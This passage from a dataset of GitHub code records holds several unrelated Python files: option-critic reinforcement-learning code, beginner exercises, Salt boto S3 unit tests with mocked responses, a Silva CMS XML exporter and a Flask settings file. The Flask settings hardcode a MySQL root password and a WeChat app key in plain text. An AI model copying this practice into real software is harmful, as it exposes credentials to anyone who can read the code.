np.zeros((nstates,))\n\n\tdef pmf(self, state):\n\t\treturn expit(self.weights[state])\n\n\tdef sample(self, state):\n\t\treturn int(self.rng.uniform() < self.pmf(state))\n\n\tdef gradient(self, state):\n\t\treturn self.pmf(state) * (1.0 - self.pmf(state)), state\n\n\tdef update(self, state, advantage):\n\t\tmagnitude, direction = self.gradient(state)\n\t\tself.weights[direction] -= self.lr * magnitude * advantage\n\n\nclass Critic():\n\n\tdef __init__(self, 
lr, discount, Q_Omega_table, nstates, noptions, nactions):\n\t\tself.lr = lr\n\t\tself.discount = discount\n\t\tself.Q_Omega_table = Q_Omega_table\n\t\tself.Q_U_table = np.zeros((nstates, noptions, nactions))\n\n\tdef cache(self, state, option, action):\n\t\tself.last_state = state\n\t\tself.last_option = option\n\t\tself.last_action = action\n\t\tself.last_Q_Omega = self.Q_Omega(state, option)\n\n\tdef Q_Omega(self, state, option=None):\n\t\tif option is None:\n\t\t\treturn self.Q_Omega_table[state, :]\n\t\telse:\n\t\t\treturn self.Q_Omega_table[state, option]\n\n\tdef Q_U(self, state, option, action):\n\t\treturn self.Q_U_table[state, option, action]\n\n\tdef A_Omega(self, state, option=None):\n\t\tadvantage = self.Q_Omega(state) - np.max(self.Q_Omega(state))\n\n\t\tif option is None:\n\t\t\treturn advantage\n\t\telse:\n\t\t\treturn advantage[option]\n\n\tdef update_Qs(self, state, option, action, reward, done, terminations):\n\t\t# One step target for Q_Omega\n\t\ttarget = reward\n\t\tif not done:\n\t\t\tbeta_omega = terminations[self.last_option].pmf(state)\n\t\t\ttarget += self.discount * ((1.0 - beta_omega)*self.Q_Omega(state, self.last_option) + \\\n\t\t\t\t\t\tbeta_omega*np.max(self.Q_Omega(state)))\n\n\t\t# Difference update\n\t\ttderror_Q_Omega = target - self.last_Q_Omega\n\t\tself.Q_Omega_table[self.last_state, self.last_option] += self.lr * tderror_Q_Omega\n\n\t\ttderror_Q_U = target - self.Q_U(self.last_state, self.last_option, self.last_action)\n\t\tself.Q_U_table[self.last_state, self.last_option, self.last_action] += self.lr * tderror_Q_U\n\n\t\t# Cache\n\t\tself.last_state = state\n\t\tself.last_option = option\n\t\tself.last_action = action\n\t\tif not done:\n\t\t\tself.last_Q_Omega = self.Q_Omega(state, option)\n\n\ndef train_oc(n_options=4, nruns=10, nsteps=1000, seed=1234):\n    # Discount\n    discount = 0.99\n\n    # Learning rates - termination, intra-option, critic\n    lr_term = 0.25\n    lr_intra = 0.25\n    lr_critic = 0.5\n\n    # Epsilon for epsilon-greedy for policy over options\n    epsilon = 1e-1\n\n    # Temperature for softmax\n    temperature = 1e-2\n\n    # Number of runs\n    #nruns = nruns\n\n    # Number of episodes per run\n    nepisodes = nsteps\n\n    # Maximum number of steps per episode\n    nsteps = 1000\n\n    # Number of options\n    noptions = n_options\n    \n    # Random number generator for reproducibility\n    rng = np.random.RandomState(seed)\n    # The possible next goals (all in the lower right room)\n    possible_next_goals = [68, 69, 70, 71, 72, 78, 79, 80, 81, 82, 88, 89, 90, 91, 92, 93, 99, 100, 101, 102, 103]\n    \n    env = FourRooms()\n    env.reset()\n\n    clear_output(True)\n    plt.imshow(env.render(show_goal=False), cmap='Blues')\n    plt.axis('off')\n    plt.show()\n    \n    # History of steps and average durations\n    history = np.zeros((nruns, nepisodes, 2))\n\n    option_terminations_list = []\n\n    for run in range(nruns):\n\n        env = FourRooms()\n\n        nstates = env.observation_space.shape[0]\n        nactions = env.action_space.shape[0]\n\n        # Following three belong to the Actor\n\n        # 1. The intra-option policies - linear softmax functions\n        option_policies = [SoftmaxPolicy(rng, lr_intra, nstates, nactions, temperature) for _ in range(noptions)]\n\n        # 2. The termination function - linear sigmoid function\n        option_terminations = [SigmoidTermination(rng, lr_term, nstates) for _ in range(noptions)]\n\n        # 3. 
The epsilon-greedy policy over options\n policy_over_options = EpsGreedyPolicy(rng, nstates, noptions, epsilon)\n\n # Critic\n critic = Critic(lr_critic, discount, policy_over_options.Q_Omega_table, nstates, noptions, nactions)\n\n print('Goal: ', env.goal)\n\n for episode in range(nepisodes):\n\n # Change goal location after 1000 episodes \n # Comment it for not doing transfer experiments\n if episode == 1000:\n env.goal = rng.choice(possible_next_goals)\n print('New goal: ', env.goal)\n\n state = env.reset()\n\n option = policy_over_options.sample(state)\n action = option_policies[option].sample(state)\n\n critic.cache(state, option, action)\n\n duration = 1\n option_switches = 0\n avg_duration = 0.0\n\n for step in range(nsteps):\n\n state, reward, done, _ = env.step(action)\n\n # Termination might occur upon entering new state\n if option_terminations[option].sample(state):\n option = policy_over_options.sample(state)\n option_switches += 1\n avg_duration += (1.0/option_switches)*(duration - avg_duration)\n duration = 1\n\n action = option_policies[option].sample(state)\n\n # Critic update\n critic.update_Qs(state, option, action, reward, done, option_terminations)\n\n # Intra-option policy update with baseline\n Q_U = critic.Q_U(state, option, action)\n Q_U = Q_U - critic.Q_Omega(state, option)\n option_policies[option].update(state, action, Q_U)\n\n # Termination condition update\n option_terminations[option].update(state, critic.A_Omega(state, option))\n\n duration += 1\n\n if done:\n break\n\n history[run, episode, 0] = step\n history[run, episode, 1] = avg_duration\n\n option_terminations_list.append(option_terminations)\n\n # Plot stuff\n clear_output(True)\n plt.figure(figsize=(20,6))\n plt.subplot(121)\n plt.title('run: %s' % run)\n plt.xlabel('episodes')\n plt.ylabel('steps')\n plt.plot(np.mean(history[:run+1,:,0], axis=0))\n plt.grid(True)\n plt.subplot(122)\n plt.title('run: %s' % run)\n plt.xlabel('episodes')\n plt.ylabel('avg. 
option duration')\n plt.plot(np.mean(history[:run+1,:,1], axis=0))\n plt.grid(True)\n plt.show()\n \n ################\n #Plot termination\n ################\n \n for run in range(nruns):\n \n termination_maps = [env.occupancy.astype('float64') for _ in range(noptions)]\n\n for option in range(noptions):\n state = 0\n for i in range(13):\n for j in range(13):\n if termination_maps[option][i,j] == 0:\n termination_maps[option][i,j] = option_terminations_list[run][option].pmf(state)\n state += 1\n\n clear_output(True)\n print('Run: {}'.format(run))\n plt.figure(figsize=(20,5))\n plt.subplot(141)\n plt.title('option: 0', fontsize=20)\n plt.imshow(termination_maps[0], cmap='Blues')\n plt.axis('off')\n plt.subplot(142)\n plt.title('option: 1', fontsize=20)\n plt.imshow(termination_maps[1], cmap='Blues')\n plt.axis('off')\n plt.subplot(143)\n plt.title('option: 2', fontsize=20)\n plt.imshow(termination_maps[2], cmap='Blues')\n plt.axis('off')\n plt.subplot(144)\n plt.title('option: 3', fontsize=20)\n plt.imshow(termination_maps[3], cmap='Blues')\n plt.axis('off')\n plt.show()\n sleep(2)\n \n ##########\n # Run test\n #########\n policy_over_options.epsilon = 0\n for option in range(noptions):\n option_policies[option].temperature = 1e-10\n\n env = FourRooms()\n\n nepisodes = 10\n\n rng = np.random.RandomState(1234)\n\n for episode in range(nepisodes):\n\n state = env.reset()\n\n option = policy_over_options.sample(state)\n\n for step in range(nsteps):\n\n action = option_policies[option].sample(state)\n\n state, reward, done, _ = env.step(action)\n\n # Termination might occur upon entering new state\n if option_terminations[option].sample(state):\n option = policy_over_options.sample(state)\n\n clear_output(True)\n plt.figure(figsize=(10,4))\n plt.subplot(121)\n plt.title('episode: {}, step: {}'.format(episode, step), fontsize=20)\n plt.imshow(env.render(), cmap='Blues', )\n plt.axis('off')\n plt.subplot(122)\n plt.title('option: %s' %option, fontsize=20)\n plt.imshow(termination_maps[option], cmap='Blues')\n plt.axis('off')\n plt.show()\n\n if done:\n break\n\n print(\"Goal reached!\")\n sleep(2)\n ","repo_name":"hvedr/tcs-risk-rl-course","sub_path":"seminars/hier1/option_critic_table.py","file_name":"option_critic_table.py","file_ext":"py","file_size_in_byte":13064,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"25437662819","text":"print(\"\")\nprint(\"Welcome to RN Mortgage Calculator.\")\namount = input(\"Please enter amount without interest (Do not include currency symbol). \")\nif(str.isdigit(str(amount))):\n years = input(\"Please enter years. \")\n amount = float(amount) + (float(amount) * 0.03)\n amount = round(amount, 2)\n if(str.isdigit(str(years))):\n yearsComplete = input(\"Please enter years that have been completed. \")\n months = int(years) * 12\n if(str.isdigit(str(yearsComplete)) and int(yearsComplete) < int(years)):\n amountComplete = input(\"Please enter the amount that you have paid already (Do not include currency symbol). 
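
# --- Aside (added, illustrative, assumes the classes in the record above are
# in scope): a SoftmaxPolicy's pmf must be a valid probability distribution
# for rng.choice() to accept it, which is easy to sanity-check. With zero
# weights the distribution is uniform over the actions.
import numpy as np

rng = np.random.RandomState(0)
pi = SoftmaxPolicy(rng, lr=0.25, nstates=5, nactions=4, temperature=1e-2)
probs = pi.pmf(0)
assert np.isclose(probs.sum(), 1.0)
print(probs, pi.sample(0))  # uniform [0.25 0.25 0.25 0.25] and a sampled action
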
\")\n monthsComplete = int(yearsComplete) * 12\n if(str.isdigit(str(amountComplete)) and int(amountComplete) < int(amount)):\n amountLeft = float(amount) - int(amountComplete)\n amountLeft = round(amountLeft, 2)\n monthsLeft = months - monthsComplete\n averageLeft = amountLeft / monthsLeft\n print(\"You have to pay \" + str(amountLeft) + \" in \" + str(monthsLeft) + \" months at \" + str(averageLeft) + \" per month.\")\n average = float(amount) / months\n average = round(average, 2)\n if(average < averageLeft):\n aboveBelow = \"below\"\n end = \"You've got to pay up quickly!\"\n elif(average > averageLeft):\n aboveBelow = \"above\"\n end = \"You can sit back and relax!\"\n else:\n aboveBelow = \"on\"\n end = \"You're right on the mark!\"\n print(\"You are \" + aboveBelow + \" average. The average for the full mortgage is \" + str(average) + \" per month and your average left is \" + str(averageLeft) + \" per month. \" + end)\n \n elif(amountComplete >= amount):\n print(\"Amount complete must be less than amount\")\n \n else:\n print(\"Please enter a number instead.\")\n\n elif(yearsComplete >= years):\n print(\"Years complete must be less than years\")\n \n else:\n print(\"Please enter a number instead.\")\n\n else:\n print(\"Please enter a number instead (currency symbols not allowed).\")\n\nelse:\n print(\"Please enter a number instead (currency symbols not allowed).\")\n\nprint(\"\")","repo_name":"nayakrujul/python-scripts","sub_path":"Old Programs/Mortgage_Calculator.py","file_name":"Mortgage_Calculator.py","file_ext":"py","file_size_in_byte":2403,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"5717455738","text":"def choose(n, k):\n first = 1\n second = 1\n third = 1\n for i in range (n):\n first = first* (n-i)\n for x in range (k):\n second = second*(k-x)\n for a in range (n-k):\n third *= (n-k) - a\n solution = first/(second*third)\n return solution\n","repo_name":"pranjaj011/CEMC-CS-circles-exercises","sub_path":"Chapter15/Be choosy pt2 without import.py","file_name":"Be choosy pt2 without import.py","file_ext":"py","file_size_in_byte":263,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"24151619466","text":"# https://swexpertacademy.com/main/code/problem/problemDetail.do?problemLevel=1&contestProbId=AV5QSEhaA5sDFAUq&categoryId=AV5QSEhaA5sDFAUq&categoryType=CODE&problemTitle=&orderBy=FIRST_REG_DATETIME&selectCodeLang=PYTHON&select-1=1&pageSize=30&pageIndex=1\nimport sys\ninput = sys.stdin.readline\n\nT = int(input())\nfor i in range(1, T + 1):\n ary = list(map(int, input().split()))\n sum = 0\n for a in ary:\n if a % 2 == 1:\n sum += a\n print(f\"#{i} {sum}\")","repo_name":"kmg733/CodingTest","sub_path":"SWEA/D1/2072_홀수만 더하기.py","file_name":"2072_홀수만 더하기.py","file_ext":"py","file_size_in_byte":477,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"6224733344","text":"# -*- coding: utf-8 -*-\n\n# Import Python libs\nfrom __future__ import absolute_import, print_function, unicode_literals\nfrom copy import deepcopy\nimport logging\nimport random\nimport string\n\n# Import Salt Testing libs\nfrom tests.support.mixins import LoaderModuleMockMixin\nfrom tests.support.unit import skipIf, TestCase\nfrom tests.support.mock import MagicMock, NO_MOCK, NO_MOCK_REASON, patch\n\n# Import Salt libs\nfrom salt.ext import six\nimport salt.loader\nfrom salt.utils.versions import LooseVersion\nimport 
salt.states.boto_s3_bucket as boto_s3_bucket\n\n# pylint: disable=import-error,no-name-in-module,unused-import\nfrom tests.unit.modules.test_boto_s3_bucket import BotoS3BucketTestCaseMixin\n\n# Import 3rd-party libs\nfrom salt.ext.six.moves import range # pylint: disable=import-error,redefined-builtin\ntry:\n import boto\n import boto3\n from botocore.exceptions import ClientError\n HAS_BOTO = True\nexcept ImportError:\n HAS_BOTO = False\n\n# pylint: enable=import-error,no-name-in-module,unused-import\n\n# the boto_s3_bucket module relies on the connect_to_region() method\n# which was added in boto 2.8.0\n# https://github.com/boto/boto/commit/33ac26b416fbb48a60602542b4ce15dcc7029f12\nrequired_boto3_version = '1.2.1'\n\nlog = logging.getLogger(__name__)\n\n\ndef _has_required_boto():\n '''\n Returns True/False boolean depending on if Boto is installed and correct\n version.\n '''\n if not HAS_BOTO:\n return False\n elif LooseVersion(boto3.__version__) < LooseVersion(required_boto3_version):\n return False\n else:\n return True\n\nif _has_required_boto():\n region = 'us-east-1'\n access_key = 'GKTADJGHEIQSXMKKRBJ08H'\n secret_key = 'askdjghsdfjkghWupUjasdflkdfklgjsdfjajkghs'\n conn_parameters = {'region': region, 'key': access_key, 'keyid': secret_key, 'profile': {}}\n error_message = 'An error occurred (101) when calling the {0} operation: Test-defined error'\n not_found_error = ClientError({\n 'Error': {\n 'Code': '404',\n 'Message': \"Test-defined error\"\n }\n }, 'msg')\n error_content = {\n 'Error': {\n 'Code': 101,\n 'Message': \"Test-defined error\"\n }\n }\n list_ret = {\n 'Buckets': [{\n 'Name': 'mybucket',\n 'CreationDate': None\n }],\n 'Owner': {\n 'Type': 'CanonicalUser',\n 'DisplayName': 'testuser',\n 'ID': '111111222222'\n },\n 'ResponseMetadata': {'Key': 'Value'}\n }\n config_in = {\n 'LocationConstraint': 'EU',\n 'ACL': {\n 'ACL': 'public-read'\n },\n 'CORSRules': [{\n 'AllowedMethods': [\"GET\"],\n 'AllowedOrigins': [\"*\"],\n }],\n 'LifecycleConfiguration': [{\n 'Expiration': {\n 'Days': 1\n },\n 'Prefix': 'prefix',\n 'Status': 'Enabled',\n 'ID': 'asdfghjklpoiuytrewq'\n }],\n 'Logging': {\n 'TargetBucket': 'my-bucket',\n 'TargetPrefix': 'prefix'\n },\n 'NotificationConfiguration': {\n 'LambdaFunctionConfigurations': [{\n 'LambdaFunctionArn': 'arn:aws:lambda:us-east-1:111111222222:function:my-function',\n 'Id': 'zxcvbnmlkjhgfdsa',\n 'Events': [\"s3:ObjectCreated:*\"],\n 'Filter': {\n 'Key': {\n 'FilterRules': [{\n 'Name': 'prefix',\n 'Value': 'string'\n }]\n }\n }\n }]\n },\n 'Policy': {\n 'Version': \"2012-10-17\",\n 'Statement': [{\n 'Sid': \"\",\n 'Effect': \"Allow\",\n 'Principal': {\n 'AWS': \"arn:aws:iam::111111222222:root\"\n },\n 'Action': \"s3:PutObject\",\n 'Resource': \"arn:aws:s3:::my-bucket/*\"\n }]\n },\n 'Replication': {\n 'Role': 'arn:aws:iam::11111222222:my-role',\n 'Rules': [{\n 'ID': \"r1\",\n 'Prefix': \"prefix\",\n 'Status': \"Enabled\",\n 'Destination': {\n 'Bucket': \"arn:aws:s3:::my-bucket\"\n }\n }]\n },\n 'RequestPayment': {\n 'Payer': 'Requester'\n },\n 'Tagging': {\n 'a': 'b',\n 'c': 'd'\n },\n 'Versioning': {\n 'Status': 'Enabled'\n },\n 'Website': {\n 'ErrorDocument': {\n 'Key': 'error.html'\n },\n 'IndexDocument': {\n 'Suffix': 'index.html'\n }\n }\n }\n config_ret = {\n 'get_bucket_acl': {\n 'Grants': [{\n 'Grantee': {\n 'Type': 'Group',\n 'URI': 'http://acs.amazonaws.com/groups/global/AllUsers'\n },\n 'Permission': 'READ'\n }],\n 'Owner': {\n 'DisplayName': 'testuser',\n 'ID': '111111222222'\n }\n },\n 'get_bucket_cors': {\n 'CORSRules': [{\n 
'AllowedMethods': [\"GET\"],\n 'AllowedOrigins': [\"*\"],\n }]\n },\n 'get_bucket_lifecycle_configuration': {\n 'Rules': [{\n 'Expiration': {\n 'Days': 1\n },\n 'Prefix': 'prefix',\n 'Status': 'Enabled',\n 'ID': 'asdfghjklpoiuytrewq'\n }]\n },\n 'get_bucket_location': {\n 'LocationConstraint': 'EU'\n },\n 'get_bucket_logging': {\n 'LoggingEnabled': {\n 'TargetBucket': 'my-bucket',\n 'TargetPrefix': 'prefix'\n }\n },\n 'get_bucket_notification_configuration': {\n 'LambdaFunctionConfigurations': [{\n 'LambdaFunctionArn': 'arn:aws:lambda:us-east-1:111111222222:function:my-function',\n 'Id': 'zxcvbnmlkjhgfdsa',\n 'Events': [\"s3:ObjectCreated:*\"],\n 'Filter': {\n 'Key': {\n 'FilterRules': [{\n 'Name': 'prefix',\n 'Value': 'string'\n }]\n }\n }\n }]\n },\n 'get_bucket_policy': {\n 'Policy':\n '{\"Version\":\"2012-10-17\",\"Statement\":[{\"Sid\":\"\",\"Effect\":\"Allow\",\"Principal\":{\"AWS\":\"arn:aws:iam::111111222222:root\"},\"Action\":\"s3:PutObject\",\"Resource\":\"arn:aws:s3:::my-bucket/*\"}]}'\n },\n 'get_bucket_replication': {\n 'ReplicationConfiguration': {\n 'Role': 'arn:aws:iam::11111222222:my-role',\n 'Rules': [{\n 'ID': \"r1\",\n 'Prefix': \"prefix\",\n 'Status': \"Enabled\",\n 'Destination': {\n 'Bucket': \"arn:aws:s3:::my-bucket\"\n }\n }]\n }\n },\n 'get_bucket_request_payment': {'Payer': 'Requester'},\n 'get_bucket_tagging': {\n 'TagSet': [{\n 'Key': 'c',\n 'Value': 'd'\n }, {\n 'Key': 'a',\n 'Value': 'b',\n }]\n },\n 'get_bucket_versioning': {\n 'Status': 'Enabled'\n },\n 'get_bucket_website': {\n 'ErrorDocument': {\n 'Key': 'error.html'\n },\n 'IndexDocument': {\n 'Suffix': 'index.html'\n }\n }\n }\n bucket_ret = {\n 'Location': 'EU'\n }\n\n\n@skipIf(HAS_BOTO is False, 'The boto module must be installed.')\n@skipIf(_has_required_boto() is False, 'The boto3 module must be greater than'\n ' or equal to version {0}'\n .format(required_boto3_version))\n@skipIf(NO_MOCK, NO_MOCK_REASON)\nclass BotoS3BucketStateTestCaseBase(TestCase, LoaderModuleMockMixin):\n conn = None\n\n def setup_loader_modules(self):\n ctx = {}\n utils = salt.loader.utils(self.opts, whitelist=['boto', 'boto3'], context=ctx)\n serializers = salt.loader.serializers(self.opts)\n self.funcs = funcs = salt.loader.minion_mods(self.opts, context=ctx, utils=utils, whitelist=['boto_s3_bucket'])\n self.salt_states = salt.loader.states(opts=self.opts, functions=funcs, utils=utils, whitelist=['boto_s3_bucket'],\n serializers=serializers)\n return {\n boto_s3_bucket: {\n '__opts__': self.opts,\n '__salt__': funcs,\n '__utils__': utils,\n '__states__': self.salt_states,\n '__serializers__': serializers,\n }\n }\n\n @classmethod\n def setUpClass(cls):\n cls.opts = salt.config.DEFAULT_MINION_OPTS\n cls.opts['grains'] = salt.loader.grains(cls.opts)\n\n @classmethod\n def tearDownClass(cls):\n del cls.opts\n\n def setUp(self):\n self.addCleanup(delattr, self, 'funcs')\n self.addCleanup(delattr, self, 'salt_states')\n # connections keep getting cached from prior tests, can't find the\n # correct context object to clear it. 
So randomize the cache key, to prevent any\n # cache hits\n conn_parameters['key'] = ''.join(random.choice(string.ascii_lowercase + string.digits) for _ in range(50))\n\n self.patcher = patch('boto3.session.Session')\n self.addCleanup(self.patcher.stop)\n self.addCleanup(delattr, self, 'patcher')\n mock_session = self.patcher.start()\n\n session_instance = mock_session.return_value\n self.conn = MagicMock()\n self.addCleanup(delattr, self, 'conn')\n session_instance.client.return_value = self.conn\n\n\nclass BotoS3BucketTestCase(BotoS3BucketStateTestCaseBase, BotoS3BucketTestCaseMixin):\n '''\n TestCase for salt.modules.boto_s3_bucket state.module\n '''\n\n def test_present_when_bucket_does_not_exist(self):\n '''\n Tests present on a bucket that does not exist.\n '''\n self.conn.head_bucket.side_effect = [not_found_error, None]\n self.conn.list_buckets.return_value = deepcopy(list_ret)\n self.conn.create_bucket.return_value = bucket_ret\n for key, value in six.iteritems(config_ret):\n getattr(self.conn, key).return_value = deepcopy(value)\n with patch.dict(self.funcs, {'boto_iam.get_account_id': MagicMock(return_value='111111222222')}):\n result = self.salt_states['boto_s3_bucket.present'](\n 'bucket present',\n Bucket='testbucket',\n **config_in\n )\n\n self.assertTrue(result['result'])\n self.assertEqual(result['changes']['new']['bucket']['Location'], config_ret['get_bucket_location'])\n\n def test_present_when_bucket_exists_no_mods(self):\n self.conn.list_buckets.return_value = deepcopy(list_ret)\n for key, value in six.iteritems(config_ret):\n getattr(self.conn, key).return_value = deepcopy(value)\n with patch.dict(self.funcs, {'boto_iam.get_account_id': MagicMock(return_value='111111222222')}):\n result = self.salt_states['boto_s3_bucket.present'](\n 'bucket present',\n Bucket='testbucket',\n **config_in\n )\n\n self.assertTrue(result['result'])\n self.assertEqual(result['changes'], {})\n\n def test_present_when_bucket_exists_all_mods(self):\n self.conn.list_buckets.return_value = deepcopy(list_ret)\n for key, value in six.iteritems(config_ret):\n getattr(self.conn, key).return_value = deepcopy(value)\n with patch.dict(self.funcs, {'boto_iam.get_account_id': MagicMock(return_value='111111222222')}):\n result = self.salt_states['boto_s3_bucket.present'](\n 'bucket present',\n Bucket='testbucket',\n LocationConstraint=config_in['LocationConstraint']\n )\n\n self.assertTrue(result['result'])\n self.assertNotEqual(result['changes'], {})\n\n def test_present_with_failure(self):\n self.conn.head_bucket.side_effect = [not_found_error, None]\n self.conn.list_buckets.return_value = deepcopy(list_ret)\n self.conn.create_bucket.side_effect = ClientError(error_content, 'create_bucket')\n with patch.dict(self.funcs, {'boto_iam.get_account_id': MagicMock(return_value='111111222222')}):\n result = self.salt_states['boto_s3_bucket.present'](\n 'bucket present',\n Bucket='testbucket',\n **config_in\n )\n self.assertFalse(result['result'])\n self.assertTrue('Failed to create bucket' in result['comment'])\n\n def test_absent_when_bucket_does_not_exist(self):\n '''\n Tests absent on a bucket that does not exist.\n '''\n self.conn.head_bucket.side_effect = [not_found_error, None]\n result = self.salt_states['boto_s3_bucket.absent']('test', 'mybucket')\n self.assertTrue(result['result'])\n self.assertEqual(result['changes'], {})\n\n def test_absent_when_bucket_exists(self):\n result = self.salt_states['boto_s3_bucket.absent']('test', 'testbucket')\n self.assertTrue(result['result'])\n 
self.assertEqual(result['changes']['new']['bucket'], None)\n\n def test_absent_with_failure(self):\n self.conn.delete_bucket.side_effect = ClientError(error_content, 'delete_bucket')\n result = self.salt_states['boto_s3_bucket.absent']('test', 'testbucket')\n self.assertFalse(result['result'])\n self.assertTrue('Failed to delete bucket' in result['comment'])\n","repo_name":"gtmanfred/fractus","sub_path":"tests/unit/states/skip_test_boto_s3_bucket.py","file_name":"skip_test_boto_s3_bucket.py","file_ext":"py","file_size_in_byte":14024,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"27"} +{"seq_id":"40770721915","text":"import logging\n\nfrom five import grok\nfrom zope.interface import Interface\n\nfrom silva.core.editor.transform.base import TransformationFilter\nfrom silva.core.editor.transform.interfaces import ISilvaXMLExportFilter\nfrom silva.core.interfaces import IVersion, ISilvaXMLProducer\nfrom silva.core.xml import producers, NS_SILVA_URI\nfrom zeam.component import getWrapper\nfrom zeam.form.silva.interfaces import IXMLFormSerialization\n\nfrom . import NS_SOURCE_URI\nfrom ..interfaces import IExternalSourceManager\nfrom ..interfaces import ISourceAsset, ISourceAssetVersion\nfrom ..errors import SourceError\nfrom .treehandler import ElementTreeContentHandler\n\n\nlogger = logging.getLogger('silva.core.xml')\n\n\nclass FieldProducer(ElementTreeContentHandler):\n\n def __init__(self, context, handler, **kwargs):\n ElementTreeContentHandler.__init__(self, **kwargs)\n self.context = context\n self.__handler = handler\n\n def getHandler(self):\n return self.__handler\n\n\nclass ExternalSourceExportFilter(TransformationFilter):\n grok.adapts(IVersion, ISilvaXMLProducer)\n grok.provides(ISilvaXMLExportFilter)\n\n def __init__(self, context, handler):\n self.context = context\n self.handler = handler\n\n def prepare(self, name, text):\n self.sources = getWrapper(self.context, IExternalSourceManager)\n\n def __call__(self, tree):\n exported = self.handler.getExported()\n for node in tree.xpath(\n '//html:div[contains(@class, \"external-source\")]',\n namespaces={'html': 'http://www.w3.org/1999/xhtml'}):\n if 'data-source-instance' not in node.attrib:\n exported.reportProblem(\n u'Broken source in document while exporting: '\n u'Source parameters are missing.',\n self.context)\n continue\n identifier = node.attrib['data-source-instance']\n del node.attrib['data-source-instance']\n\n try:\n source = self.sources(exported.request, instance=identifier)\n except SourceError as error:\n exported.reportProblem(\n u'Broken source in document while exporting:'\n u'{0}'.format(error),\n self.context)\n continue\n if source.source is None:\n exported.reportProblem(\n u'Broken source in document while exporting: '\n u'source is no longer installed in the Silva site.',\n self.context)\n continue\n node.attrib['source-identifier'] = source.getSourceId()\n\n # Fix this.\n producer = FieldProducer(self.context, self.handler, root=node)\n producer.startPrefixMapping(None, NS_SOURCE_URI)\n producer.startElement('fields')\n for serializer in getWrapper(\n source, IXMLFormSerialization).getSerializers():\n producer.startElement(\n 'field', {(None, 'id'): serializer.identifier})\n serializer(producer)\n producer.endElement('field')\n producer.endElement('fields')\n producer.endPrefixMapping(None)\n\n\nclass SourceParametersProducer(object):\n \"\"\" A Mixin class for exporting a source parameters.\n \"\"\"\n\n def getHandler(self):\n return self\n\n def 
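
# --- Aside (added, illustrative): the essence of the mocking pattern the
# test case above relies on -- patch boto3.session.Session so that client()
# hands back a MagicMock whose responses you script. This uses the stdlib
# unittest.mock rather than Salt's wrapper, and assumes boto3 is installed.
from unittest.mock import MagicMock, patch

with patch("boto3.session.Session") as mock_session:
    conn = MagicMock()
    mock_session.return_value.client.return_value = conn
    conn.list_buckets.return_value = {"Buckets": []}

    import boto3
    client = boto3.session.Session().client("s3")
    assert client.list_buckets() == {"Buckets": []}
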
sax_source_parameters(self, source_manager):\n        \"\"\"`source_manager` should be an IExternalSourceManager bound to\n        an instance.\n        \"\"\"\n        self.startElementNS(NS_SOURCE_URI, 'fields')\n        for serializer in getWrapper(\n                source_manager, IXMLFormSerialization).getSerializers():\n            self.startElementNS(\n                NS_SOURCE_URI,\n                'field',\n                {(None, 'id'): serializer.identifier})\n            serializer(self)\n            self.endElementNS(NS_SOURCE_URI, 'field')\n        self.endElementNS(NS_SOURCE_URI, 'fields')\n\n\nclass SourceAssetProducer(producers.SilvaVersionedContentProducer):\n    grok.adapts(ISourceAsset, Interface)\n\n    def sax(self):\n        self.startElementNS(NS_SOURCE_URI, 'source_asset',\n                            {'id': self.context.id})\n        self.sax_workflow()\n        self.sax_versions()\n        self.endElementNS(NS_SOURCE_URI, 'source_asset')\n\n\nclass SourceAssetVersionProducer(producers.SilvaProducer,\n                                 SourceParametersProducer):\n    grok.adapts(ISourceAssetVersion, Interface)\n\n    def sax(self):\n        manager = self.context.get_controller(self.getExported().request)\n        self.startElementNS(\n            NS_SILVA_URI,\n            'content',\n            {'version_id': self.context.id,\n             'source_identifier': manager.getSourceId()})\n        self.sax_metadata()\n        self.sax_source_parameters(manager)\n        self.endElementNS(NS_SILVA_URI, 'content')\n\n","repo_name":"silvacms/Products.SilvaExternalSources","sub_path":"Products/SilvaExternalSources/silvaxml/xmlexport.py","file_name":"xmlexport.py","file_ext":"py","file_size_in_byte":4911,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"}
+{"seq_id":"44345172390","text":"DEBUG=True\nSQLALCHEMY_ECHO=True\nSQLALCHEMY_ENCODING=\"utf-8\"\nSERVER_PORT=9000\nSQLALCHEMY_DATABASE_URI='mysql://root:123456@127.0.0.1/food_db'\nSQLALCHEMY_TRACK_MODIFICATIONS=False\nJSON_AS_ASCII=False\n\n## URL filter patterns\nIGNORE_URLS = [\n    \"^/user/login\",\n    \"^/api\"\n]\n\nIGNORE_CHECK_LOGIN_URLS = [\n    \"^/static\",\n    \"^/favicon.ico\"\n]\n\nAPI_IGNORE_URLS = [\n    \"^/api\"\n]\n\nSTATUS_MAPPING = {\n    \"1\":\"正常\",\n    \"0\":\"已删除\"\n}\nPAGE_SIZE=50\nPAGE_DISPLAY=10\n\n\n\nMINA_APP={\n    \"appid\":\"wx4ef416cbfab4b7c3\",\n    \"appkey\":\"6b56c913e3cdc88627f179d72ac30c01\"\n}\n\nUPLOAD = {\n    'ext':[ 'jpg','gif','bmp','jpeg','png' ],\n    'prefix_path':'/web/static/upload/',\n    'prefix_url':'/static/upload/'\n}\n\nAPP = {\n    'domain':'http://127.0.0.1:9000'\n}\n\n\nPAY_STATUS_MAPPING = {\n    \"1\":\"已支付\",\n    \"-8\":\"待支付\",\n    \"0\":\"已关闭\"\n}\n\nPAY_STATUS_DISPLAY_MAPPING = {\n    \"0\":\"订单关闭\",\n    \"1\":\"支付成功\",\n    \"-8\":\"待支付\",\n    \"-7\":\"待发货\",\n    \"-6\":\"待确认\",\n    \"-5\":\"待评价\"\n}","repo_name":"wenrenzhejie/Ordering","sub_path":"config/base_setting.py","file_name":"base_setting.py","file_ext":"py","file_size_in_byte":992,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"}
